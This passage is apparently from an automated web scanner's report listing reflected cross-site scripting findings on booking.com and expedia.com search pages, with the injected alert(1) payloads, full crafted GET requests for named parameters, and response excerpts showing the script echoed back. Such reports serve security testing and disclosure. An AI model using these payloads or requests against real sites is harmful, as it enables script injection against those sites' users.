01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:23 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDse8sXHPGMRX9HprwKtyNbj%2Ba5CAQ3Uz9eoVzkg70RpUFnm2042B3579UQ5qP3P7oyaegNlsgBKG2atnlnur6lQD5U81gNSkzLpiXUksnHO6av8%2BLst085XwnjXOfYTCWcbO90%2F4qY%2FsRIUfwTkUnoph%2BhMfg98dxBkWo5n3wBCMhREl%2BoFiUHpmPWZoKMSu2CGJqkFgh6Qyzkt3Fynk%2BzW3IIDOekD6joY%2BkOYS03WztSmYe8pVB8yJWleX9eG4ATiTPwq96PvrdXBQVFVpmCh4o7z%2BNQz4l6S%2FZN%2FDBN6PFKB0lnSmOK%2FurEG8Ml9t5J%2BOB9iyNiyyv864%2Flvm2oCMbdGTmbuTnQFj2zwpKCbmBRtF2ZFq27xHJphwAgEc87%2F%2Fc%2B4mi9mxehEBK9lAu3%2Bzlfdh7GhBrdTN4hBqs195CVMU%2Fjg6flqyX%2BeoPT4vap4DwsZ12ywkq98%2FzLUVi4UeF9LufGigU%2FOcuRo2wfkRVGmdRtL08sk%2BxMTmyNwmoXUFl40nkUrs4IQAzlpDbNfQCrlmIlSeU3BbP5JV%2Bqoj8UgSIFWbzVr7IOjAZzXScX29Zx%2BpqAegU2cw7Tm7OFWISMkaTjj3v%2FPF%2Bl41xMbU0%2FmfXff9XL1Y5FUxfNXdN1urxpyXvj8Y2PKF58e%2F7Ud%2BW4odd%2FPY5Iifl29x9reql5nJEDX4d6poDXaOzJud8kXMAsXx6%2BbeT1SNTnr%2BGxI0V8chLr06l051XSRzVFV3dqlNTZsWCa1OnYD9ZPIocwO2S0y%2Fs1TCxz1R7Q0S3s3%2BTG3cDvNkQZ8ozps9W83F9BlkOmw9g6hwymySWy3v0eMQWJ85zs1KtYKAAeqhQownd0n1%2FYiJ%2Bx6%2B3tDOsltm60cGci9%2BVkovckZo%2B8cKLLnkY0eP6Ea0KVP6JCXqorsd2ZUf865qw%2Fg3DoGwDvObWO4E%2F%2FNzNnJE%2BTk7wsFE7A0KS0VRYsRkild6STDy95%2F5Z0fnyfGZY9Q%2F1chJ7B2%2Bh1IjHNnEAOc786LN3S%2FGEpzAlBTkH4O2I1Ov7hj9YoEWIcrR%2FiRzfs%2BSA9vJLzu6IEH22ffmtK2DhPufZGShGOegaU2Kc%2Be1xB7Mdgqqkd3jKxDXugL3jzFC%2BlTFJ05OdVPMp2G4bInwOOfUw1bEoB20w5jhLYYo2qr%2FuF4cw8%2F%2F0baMQ3A7t6QW%2BZLuQmfQqLPggXBBtNtTns3ylFZVHgjVujZvDlb6hq2HJOrmVzzt4GZ2s9bhCKLcegAC91TLIQTbsxgsoMWLwNBmwrRm2pyVMo6BYIxsnXRQ5fq1NvHKekqZufmd3x4sq0uidrPjcitUPafqefdYi%2FI9vnlT4uppop07S0y9hnYvL41OGimvbcu6xn7rYpM89AxhcZPisir6Fi6vcZmO6B9Z0CmUP9tt4YzzhPvmrOzAywUPwbmeMGKz0RTfXDmNrJ0No0pVAEClHHHLs4A%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:24 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391878
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
= [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo7f430'-alert(1)-'dcfb36c82fd;utm_term=ufi-P20061717';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';


booking.env.group_
...[SNIP]...
4.233. http://www.booking.com/searchresults.html [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5cb2"><script>alert(1)</script>27c39c43203 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougof5cb2"><script>alert(1)</script>27c39c43203&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:23:09 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDWgwOhJxwg7m3%2FTm%2Bpe85rxz59CV0EgvxyeGT10beFZZcogoAsj2MaENn2KYaVZ1r0fFhSxmgUylhAQt7UHQtXRDja87uWC2XXI%2BUDMC6X3dhBduLLDaw4dqw%2FUS9hvrqfZ7Ir7BDuwlhH6su0%2BN1ni7MLD987AnAKzveI%2BGPFecjvy%2BPfJPYInweihYYq9LUaqT0z8BhwTIpQjiGKS8nijdL3YrStO2nyK2bmgtOCxOYxj8ozNDOeF6l%2BtuhiV4%2BrMtjCX2chT4vgMvL3CCCKCpgyqK%2F3F0lA4PfO55WiXGWWLLjlI1NMj8KHbtT1QK7Q%2FvbaYowTCAAeM6%2F%2BDWHhxIqHgvgRh9e44TQUjX6yLYQgjPs7RB7Zfz4ctl%2FlW0PRajbcq1Dh6rgqORADVMYgTMHxguwfPH64VqZHYpOLkzLfWeb2wvch2j8SnQPjCrUzYZX4sYOZwdbGQc7X9c37G%2FjdV5qLmD12VfnFIWvYp2fcIK8J8zRpYJ5WI72sZyBAseMq%2Fjz32f6IMsrr1tJYqbaRXD3owjsjRVq06bFkKKc9g%2FwfD0Rsxade%2BoJVHQmKyJ4PtVpfWke4w2S5xY1x0%2Fn4gbRSPaCbwTiTomT7L5D540lQJtMFC9NxrfmsZTAeXZ2HrSfc9%2Byz7RII%2BvCXMvKMVFreSS9PJtEP9L8O868P70OeCEo1ql%2FWYsK9Da%2FaxjtETkYSxWsjXyQLuQv7hDlKq7A2qBwL1JYkJzZ4ffNjVBx9xeThFFTEbuBnh2I3KWnnmJfEdvbryR1efGrN5J%2FK5WuDMxD75hf%2FCw8HLZqsFLPhGVLPBhQQ%2FCaqyxhS9Q0EMfNOJOpYIHRgE1jDQ15Z48XV4QnMvZSmVIFqwwaKGvWyO7CNQHvUTRPCJFYlroctDFvEXFsV2m7mSELrLHBgKyHKoZ8R98I8jR1Qp5TBoFV3bFM9HKLe1yM%2BKQTGSpE%2BBhMdZMBUyEvJniLXpGj4DMerhqxmiZKoROPtFcjiCcoBnkzb8Dmne9%2FXCBq02qqx8vabR799Rg%2FjqiiNjfM9kdzq6hJ5F5w8Uuer0VYZnX%2FTKw1XwRPtXqtql5k8B%2BbxCYmuqG0j0xI5e5ww%2FgkmQnSMUOi9d9GaN%2F4kFQUduhstV4uD11A2l8%2BOFya8Kcuth13fqnrdZMzp4Lfi2bunXSvjnMS4D0O9RlWrmIy5f32rMML1SMUyTAVlVMguldjgSxxr4vDY5ep76bodfWdplXNw4BGmweJ43xXpuBNQVymNqizGykoqSBm88eh6SLIuGv%2Fl8EiaJDay%2FZZhk%2FrzK3TRJjTJ%2Bp31g2Oy%2BrmgXT2w%2BW%2FIYEv97oAMSmwQzw9fFOkDHaAf4tJEgxWSbFbWCn4m1W1io5t3tMuHwTvNd2sv6OTYP5hOJfBGzPTiGLrqI9%2FTFTKmWX3rUYnVM0KyUNgNKY9t16hKs9dpqMLCCEWb6xyhw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:23:10 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391937
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougof5cb2"><script>alert(1)</script>27c39c43203;utm_term=ufi-P20061717" />
...[SNIP]...
4.234. http://www.booking.com/searchresults.html [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_term request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a141a'-alert(1)-'2eed708b64a was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717a141a'-alert(1)-'2eed708b64a HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDPZ3nY%2BK7rx45hTbiDc3NR0kCPIILsWbZor2CD1FfGdefKUJXrZ4LhRultf9wi7%2BBycH4xAtJDnocbX99V9iTV%2BCZu%2F7CR3zJukD8HaD4O%2Bn3PgwRcsOPNeQz%2FfcHJ3A0qMMXY8yG0Ri0I8JCYVxf4gOpKnX1LZ%2B13%2B6Hwn8HQQELuwdIkYYXdFOFc%2Bya2y1SdJYOwX293XsVCddY5O4Ed9skYxPbnMgpYl%2Bf6sLx94GLK%2BcvHKHQHK8NaqzRR8nz7slUofgPj2K7z4XpIqqa6KSjA6pdyak%2FWc%2BrEkI5%2BbX93FEtvkdYHtU5Y2GEazztQa50C7GgGNPEVQy22%2Bw608iybHuCrkISTj2Bf%2BQzq6idsLhjmJOLyEkyNdWC6AgeCrYDCl5cVhW8KnAlopAP5fAHChHUkHRSFpAJXbzag63EKAceWFUi6QZfBEwDxn7SaUi%2BBJE84p3G%2FqcoENQOhPHxugZlfnVlF8V8cfwaNARbYxAkRpWxUXHjiBwkFF6%2BoDWHSn7RgzPzqFcjgDNnqdxls%2Bnw7Uji4npBVggyyNuMTTUSJdSZ1Pfr1z197RMGmJ%2B8NACzXFJGLISS8FBxQjTnYJVOF6OM%2FdoS%2FHkPxBQeqGJqIoBCAMJ%2Fc2lbVczUQ2KDl22Pe7iJlXwGnN1V3y8Lwb8V9kJA%2BmvtTwOtJg8WKt6j85Ez0jttT6xADtkswCJ8b07bA0sRH9%2Fwa%2Bbn7%2FagOZWCBHF4GRHU3%2F47tQKLUsgvX44d2eSMpKnu%2FWygwE6NOhXj4PCA8xBBJEmHTJOhP5hqRHZ4gp7bu%2F4mGyyYHPVfHbr%2F2UNo2Wj%2F1PU0WLGA5IwNoIA1QLIeTSva4Mn99qy4UZjin4x32XmVJNrKhnxrNKdp6tW%2BgdAdbaY2eejT7gd1gzkrErRRRLp1WViOeW9Mtg7anCiXm3Vzn9Lpr9gT37xyElW32DEGfzYw04TGIlpr1CTVXyaWdWiMJ8CZv0IVf37s%2F%2FipxnP9bFIOCdZOiFfs237EMB7%2F4zZkX59HHKQk1bwmX0g4fTjhA2x8jTLFQAe3FjlibjVFjcCHO1bCUMCEtatpHNuABk8SOU9gUFi%2FBcpMWdfjVaCcLGE3hjnnRbw72PFt9lybtMU%2FnB1ZO6toeSrcGegfBvsCIvDMIwBuRKeNZop%2B367u9F3pEaTwUTXCbh%2FKEwPV2gSaLerX527o8y2IAL7%2FK28tsfz7yo9bAanvsZtmFtQPppDJTuzPgyPvKgcAUA5yWdDzLhPfQl6rS9n5gmgviTtbqd5QghT88r0QVbF2CBWbKEetKfmXdEqLL21Tiu2bOsFEp3AbU5Fo1XmUdgIc%2FaTMLtPPtdg5m%2BqNEQxoo35FJtp7aXHp0OB1EJNBu1sSMcW00HsrUjvvMqLSvC0CFv55uMRQDX7onAaOojVkgf55a8lcRIwsKzUo2Llx0JkVxEBNEROyUFYefQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391701
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
g.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717a141a'-alert(1)-'2eed708b64a';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.see_all_xxxx_rooms = 'XXXX more room types';


booking.env.group_room = 'Room';
booking.
...[SNIP]...
4.235. http://www.booking.com/searchresults.html [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3970"><script>alert(1)</script>ee37038bef was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717e3970"><script>alert(1)</script>ee37038bef HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:24:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YZhUqCoptreOEKGIG3i9Wj9TCGxBOeOcb2HFY1Mz6YQhiBZk%2FG19xX6cwfAkmqUOZRQoo2dmszfOrAZxpx6FIhW1VI805QdDIdiP1JTw0bAc7cMFrqIQrMPx9XDHtuOTPrjXpqYppS1QJewzeQc1ByOxgfwFWxu10RIRL1FL9yIvWJArEWN3sR7uXtN0NLu%2FMW%2BBUafdRhlGXFTbsWCGhbwjFv4%2F52Q0ja8CIXnUcAl7%2F%2Bq9NMs87kHwrPq9ih7PiItz2o9oNR%2BCtvME8%2FJff%2FDXZUGibyLHl8EvTC0n1DApDPLyTBX0QJ1oukWPFsv0XjAfvpS%2FrauO3NamL81Pzqg8bxEiuwyhIihisclrDhG24Bd5JDtKO36LpXoIjOeD21ZohZX8BGH6ZiM2C00fnTq6u2VydAgjOLxjLcp2aI1U%2FjjI4FzRJUNWGfhUI2R2tn8zrCplKh1%2Bn8QEpCIMO3VR4QPgePztyfB0iGKPKEmHIXqpaAGv1ROsSDr91LrGIq8N3YFm%2FuHIFg8Q5xmSATEtti2H%2BFcXpxfFwtIgsP5Zp3YGBOHXFLN6aRPCBi%2Bfq%2FufexPcEZ8PN0qY4TVVnxJFR7ncEHqNg%2Fmj2QhVbaizxz3hMDa48b9XxlB8HgXiBnLy47zqQPY4v%2FYZjhXc3M4Z1csvn4xccNeBX19489xpGllodjoUor%2BBpz0wYAz6H0WCQaLTMBpNeqRVu1yjGbjPrm%2B05MilCtxD1RDFn8Hwekaov8Z5v6RbLFI3AAlmi%2BX9qhuuTl%2Fo0YDKJOhVhmyTa%2F1WDqYk%2BQmZGmlUSeDip1qMxJUwCRtdYQGBANLelForJsB0AYQSn%2FgnANl3uBFVps8HnLA27HuJm3bf6BBdjRDi2S1Tt5bXGoin1bZasEzhJ3uNbVyXsUzEGQQcl%2BsW2rWGm41jgoTGR8a73zcxGsIsJXO224iVCx4RIoy8RqteP3pOxf6RxQV98jrHVQcvUjlDbMpQmTwT4BrIp61AGwxyQMTpXzumrdCOvuELSY0N4jly%2BB6D2S9wB7v0k50gORgWsD%2BP8id%2FvnglKXbu%2Fevdu12ERD4ScuaSaaW4CEkeBNd5coouMS5peSVR6eb%2BWBmyOVG1n6ncCD9pGKjpo9bSJSPfXka5j1pIE9PsuoHcgnyn0sZnzCTZ72pF6AXJTKGiLPhilyu1TJ2a2xUVTiLokfUrg5lSyK4FaTmnMj61yDrByt%2By9z75%2FwO4tUGpDuuTOo7sXXrJRdi4voXdHdNHed38rbSI6e4kDQg2Bjl7erXFG7BHb940bL%2BP6VTUQsfx7PdWJB6jbv8DonxBDO8%2FAGk%2FLeJZvquBg6wT8negxT8d%2B9GtGcNNsIL3V7jhWOn9luLPQrEX4yDhmPfxx5jsX6BTY75V0rB7phkjkcpX3bBjXd97u%2FOidtu1XsOD5DgvbJFQ2ftQgFObmZVrnZwWj0TMKvBOFsw5rvvpPw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:24:03 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 391756
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717e3970"><script>alert(1)</script>ee37038bef" />
...[SNIP]...
4.236. http://www.expedia.com/Hotel-Search [hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /Hotel-Search

Issue detail

The value of the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56895"><script>alert(1)</script>39b5d7891f9b1da0d was submitted in the hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&action=hotelPackageWizard%40searchHotelOnly&packageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_inpPackageType=HOTEL_ONLY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_hotelRegionTypeControl_inpRegionType=CITY&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCity=Boston%2CUnited+States56895"><script>alert(1)</script>39b5d7891f9b1da0d&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_hotelSearchRegionControl_cityControl_inpCityRegionId=&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpStartDate=10%2F04%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_dateRangeWidget_inpEndDate=10%2F07%2F2011&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_hotelRoomCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_adultCountInput=1&hotelPackageWizard_hotelPackageWizardControl_hotelWidgetControl_roomInputWidget_childCountInput=0&isAdditionOptionExist=0&postRedirect=1&olacid=US.BD.IGOUGO-US.HOTEL.HOTEL HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.expedia.com/pubspec/scripts/eap.asp?OLACID=US.BD.IGOUGO-US.HOTEL.HOTEL&GOTO=HotSearch&CityName=Boston,United%20States&InDate=10/04/2011&OutDate=10/07/2011&NumAdults=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p1=`tpid=v.1,1`11; MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; COOKIECHECK=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:12:24 GMT
Connection: close
Connection: Transfer-Encoding
